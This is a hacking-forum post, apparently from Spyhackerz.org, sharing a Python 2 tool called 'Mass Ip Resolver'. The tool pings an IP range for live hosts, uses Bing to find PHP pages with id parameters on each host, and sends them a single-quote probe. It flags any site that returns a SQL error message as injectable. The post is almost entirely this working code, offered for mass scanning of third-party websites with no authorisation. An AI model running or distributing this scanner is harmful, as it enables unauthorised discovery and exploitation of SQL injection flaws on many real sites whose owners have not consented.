Dil ve Sürüm:
Python 2.x
V1.0
Coded by:
@El Behram @tokikolik
Range edilen ip aralığındaki makinelerin hostlarındaki tüm sitelerde sql taraması yaparz
Kod:
[HIDE]
# -*- coding: UTF-8 -*-
import urllib
import os
import re
from time import sleep
import socket
import subprocess
import sys
red = "\033[91m"
green = "\033[93m"
default = "\033[0m"
def iprange():
print "IP Range Scanner"
print " "
ip = raw_input("enter 3 part of ip address = ")
maxrange=input("range = ")
int(maxrange)
for i in range(maxrange):
param = ip + "." + str(i)
response = os.system("ping -c 1 -w 1 " + param)
if response == 0:
print "[+] Founded an alive ip"
list_ip = open("ip.txt", 'a+')
list_ip.write(param + '\n')
list_ip.close()
else:
print "[-] Dead"
def sqlihunt(dork):
dork= 'IP:'+dork+" php?id= "
start=0
end=200
sleep(3)
print "[info]Getting Websites From Bing ... "
while start<=end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
#return find
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]+"'"
tst = urllib.urlretrieve(rez)
tstf = open(tst[0])
tstdd= tstf.read()
tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
if(tstfind):
print "[SLQi] : "+ rez
file2 =open('sql.txt','a+')
file2.write(rez + '\n')
file2.close()
else:
print "[No SQLi ] : " + rez
except IOError:
print "[ERROR]No result found"
x = """
|==================[Spyhackerz.org]====================|
__ __ ___ ____ _
| \/ | __ _ ___ ___|_ _|_ __ | _ \ ___ ___ ___ | |_ _____ _ __
| |\/| |/ _` / __/ __|| || '_ \| |_) / _ \/ __|/ _ \| \ \ / / _ \ '__|
| | | | (_| \__ \__ \| || |_) | _ < __/\__ \ (_) | |\ V / __/ |
|_| |_|\__,_|___/___/___| .__/|_| \_\___||___/\___/|_| \_/ \___|_|
|_|
==================[Spyhackerz.org]====================|
Coded by El Behram & Tokikolik """
print red + x
print red + " "
print "Mass Ip Resolver V2.0 is starting ... "
print " "
print " "
sleep(2)
while(True):
print default + "-*-*-*-*- MENU -*-*-*-*-*"
print "[1] Ip ranger"
print "[2] Mass resolver"
print "[3] Exit"
print default + " "
funch = input("Select funch number :")
if funch == 1:
print "Ip ranger is starting.."
print "enter as ---->> ab.cde.xx"
print " "
print " "
iprange()
continue
elif funch == 2:
print "Mass sql tool is tarting ..."
dosya = open("ip.txt","r")
for satir in dosya:
sqlihunt(satir.strip())
print " ./done "
continue
elif funch ==3:
print "exit"
sys.exit()
else:
print "Error"
[/HIDE]